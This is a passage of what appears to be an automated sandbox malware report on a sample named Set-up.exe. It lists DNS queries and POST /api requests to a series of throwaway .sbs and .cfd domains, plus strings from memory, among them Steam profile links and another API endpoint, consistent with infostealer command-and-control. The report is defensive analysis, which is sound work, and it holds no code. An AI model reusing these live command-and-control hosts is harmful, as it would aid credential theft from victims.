https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: sippymroat.cfd
      Source: global trafficDNS traffic detected: DNS query: mathcucom.sbs
      Source: global trafficDNS traffic detected: DNS query: allocatinow.sbs
      Source: global trafficDNS traffic detected: DNS query: enlargkiw.sbs
      Source: global trafficDNS traffic detected: DNS query: resinedyw.sbs
      Source: global trafficDNS traffic detected: DNS query: vennurviot.sbs
      Source: global trafficDNS traffic detected: DNS query: ehticsprocw.sbs
      Source: global trafficDNS traffic detected: DNS query: condifendteu.sbs
      Source: global trafficDNS traffic detected: DNS query: drawwyobstacw.sbs
      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
      Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sippymroat.cfd
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
      Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: Set-up.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: Set-up.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: Set-up.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: Set-up.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
      Source: Set-up.exeString found in binary or memory: http://www.activestate.com
      Source: Set-up.exeString found in binary or memory: http://www.activestate.comHolger
      Source: Set-up.exeString found in binary or memory: http://www.baanboard.com
      Source: Set-up.exeString found in binary or memory: http://www.baanboard.comBrendon
      Source: Set-up.exeString found in binary or memory: http://www.develop.com
      Source: Set-up.exeString found in binary or memory: http://www.develop.comDeepak
      Source: Set-up.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: Set-up.exeString found in binary or memory: http://www.lua.org
      Source: Set-up.exeString found in binary or memory: http://www.rftp.com
      Source: Set-up.exeString found in binary or memory: http://www.rftp.comJosiah
      Source: Set-up.exeString found in binary or memory: http://www.scintilla.org
      Source: Set-up.exeString found in binary or memory: http://www.scintilla.org/scite.rng
      Source: Set-up.exeString found in binary or memory: http://www.spaceblue.com
      Source: Set-up.exeString found in binary or memory: http://www.spaceblue.comMathias
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/
      Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/2
      Source: Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/api
      Source: Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/apisC
      Source: Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/pi
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawwyobstacw.sbs/api
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/B
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/api
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/apisU
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/j
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ehticsprocw.sbs/pi
      Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/
      Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/&0
      Source: Set-up.exe, 00000000.00000003.1860446631.0000000000D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/api
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
      Source: Set-up.exe, 00000000.00000003.1849993860.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1849935104.0000000000D91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/
      Source: Set-up.exe, 00000000.00000003.1849993860.0000000000D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
      Source: Set-up.exe, 00000000.00000002.2124248780.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2124248780.0000000000D54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api$
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api1
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/r
      Source: Set-up.exe, 00000000.00000002.2124248780.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/a1
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900Q1
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: Set-up.exe, 00000000.00000003.1891644416.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/=0
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/api
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/api/4
      Source: Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1891644416.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/apiP
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933909044.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1934108862.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
      Source: Set-up.exe, 00000000.00000003.1933909044.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1934108862.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: Set-up.exeString found in binary or memory: https://www.smartsharesystems.com/
      Source: Set-up.exeString found in binary or memory: https://www.smartsharesystems.com/Morten
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
